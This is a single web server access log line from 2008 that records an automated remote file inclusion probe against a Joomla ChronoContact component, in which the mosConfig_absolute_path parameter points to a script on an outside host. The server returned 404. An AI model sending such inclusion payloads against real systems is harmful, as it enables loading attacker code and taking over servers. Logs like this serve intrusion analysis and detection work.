83.240.164.232 - - [24/Jul/2008:06:56:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
